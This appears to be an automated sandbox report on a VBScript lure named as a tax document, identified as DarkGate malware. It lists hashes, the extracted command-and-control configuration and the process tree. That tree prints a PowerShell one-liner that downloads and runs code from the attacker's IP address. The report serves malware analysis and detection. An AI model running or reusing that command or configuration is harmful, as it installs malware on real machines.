Analysis
-
max time kernel
134s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-03-2024 20:35
Static task
static1
Behavioral task
behavioral1
Sample
1040documentpdf.vbs
Resource
win10v2004-20240226-en
General
-
Target
1040documentpdf.vbs
-
Size
5KB
-
MD5
e02b999dc0c9c4bba51b28c6e733055a
-
SHA1
5eb9ebe7b853dc4bb3167f7d935ee9b62ab9fbb0
-
SHA256
4d86f191c4d7a5684116b671618669ec2bdd6bc08337fa2573c773386a14b2df
-
SHA512
5713f924b7d88072b1bbf61089802f4ffddcb84c431cf9caa0ff02330e6070fe27259aba2e7455e2b113ed3740c8fea579199c5fc8242f10cb792fb2b35312d6
-
SSDEEP
96:wwUEmyDTEBzylU+/V9rkcQ3tZUHg4KRZZoPC8Wuo9d3uV0I:wwU0TEBzj+/V9g/tZUHg4KR/oa8Wuo9u
Malware Config
Extracted
darkgate
xr_itzx001
45.140.146.2
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
false
-
c2_port
443
-
check_disk
true
-
check_ram
true
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
aebaZrVV
-
minimum_disk
90
-
minimum_ram
4068
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
xr_itzx001
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral1/memory/3964-35-0x0000000005C20000-0x0000000005F6F000-memory.dmp family_darkgate_v6 behavioral1/memory/3964-36-0x0000000005C20000-0x0000000005F6F000-memory.dmp family_darkgate_v6 -
Blocklisted process makes network request 4 IoCs
flow pid Process 8 3208 powershell.exe 16 3208 powershell.exe 22 3208 powershell.exe 32 3208 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 3964 AutoIt3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoIt3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoIt3.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3208 powershell.exe 3208 powershell.exe 3208 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3208 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 1700 wrote to memory of 3208 1700 WScript.exe 86 PID 1700 wrote to memory of 3208 1700 WScript.exe 86 PID 3208 wrote to memory of 3964 3208 powershell.exe 98 PID 3208 wrote to memory of 3964 3208 powershell.exe 98 PID 3208 wrote to memory of 3964 3208 powershell.exe 98
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1040documentpdf.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '45.140.146.2:443/ivpzhehw')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\temp\AutoIt3.exe"C:\temp\AutoIt3.exe" script.a3x3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3964
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
574KB
MD59972e775b90dad80ca4efeb6d52b1e46
SHA1db0bded33c2b0a1e95caeddfeab50fd8b609a048
SHA256a629540459c2f4c213a463aa53efe555f659e149033a5d19bbbc72b6dd1a7bb5
SHA512ff3d0bc21908ff7b989bc95e105ceb9bd3b51e48b0aff55149000e0ad882c5e81b64192cdb13007ab5d6c46e46ed9aa3241e8c6cc6852079a545c977d5f2d078
-
Filesize
76B
MD56d0ea7ecc08e015c02d1ff0d92eefa92
SHA17a56bf6984e32f6b17cccde99c8d410258f84c8c
SHA256ff25440a497d42428214b76aa20138bb5d9645e5ad2d30e08d17df783b986471
SHA512a977a2d26d811598201f7e87989662716bb288290cc4fa61c56996a061465d7ae0d2d71d669ff2e0e9f6587cba451278f0a2dc4e5ec9f5843307b323b45541b2